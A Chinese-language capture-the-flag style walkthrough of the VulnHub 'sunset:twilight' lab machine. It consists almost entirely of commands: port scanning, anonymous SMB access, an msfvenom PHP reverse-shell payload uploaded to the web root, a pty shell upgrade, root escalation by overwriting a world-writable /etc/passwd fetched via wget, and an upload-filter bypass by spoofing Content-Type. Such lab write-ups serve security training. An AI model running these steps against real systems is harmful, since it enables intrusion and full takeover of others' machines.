PJzhang:vulnhub靶机sunset系列SUNSET:TWILIGHT
猫宁~~~
地址:https://www.vulnhub.com/entry/sunset-twilight,512/
关注工具和思路。
nmap 192.168.43.0/24
靶机IP
192.168.43.164
nmap -A -p1-65535 192.168.43.164
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp open http-proxy PHP cli server 5.5 or later
63525/tcp open http PHP cli server 5.5 or later
enum4linux 192.168.43.164
WRKSHARE Disk Workplace Share. Do not access if not an employee.
smbclient //192.168.43.164/WRKSHARE,无密码登录
smb: \>
cd \var\www\html
smb: \var\www\html\>
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
smb下上传muma.php
smb: \var\www\html\> put muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
访问http://192.168.43.164/muma.php,反弹shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/var/www/html$
cd /home
显示存在miguel的用户
cat /etc/passwd
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
ls -al /etc/passwd,有读写权限
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd
攻击机执行
openssl passwd -1 -salt useruser 123456
将靶机/etc/passwd复制到本地
最后一行添加
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash
python3 -m http.server 80
wget http://192.168.43.154/passwd -O /etc/passwd
su useruser
id
uid=0(root) gid=0(root) groups=0(root)
利用上传接口获取shell
dirb http://192.168.43.3/
http://192.168.43.3/gallery/
http://192.168.43.3/gallery/original/,可以查看文件目录,例如上传的muma.php
重命名muma.php为muma.php.pjpeg
上传,burpsuite抓包,
Content-Type: image/jpeg
文件名重新修改为muma.php
上传成功
http://192.168.43.3/gallery/original/muma.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
成功获取shell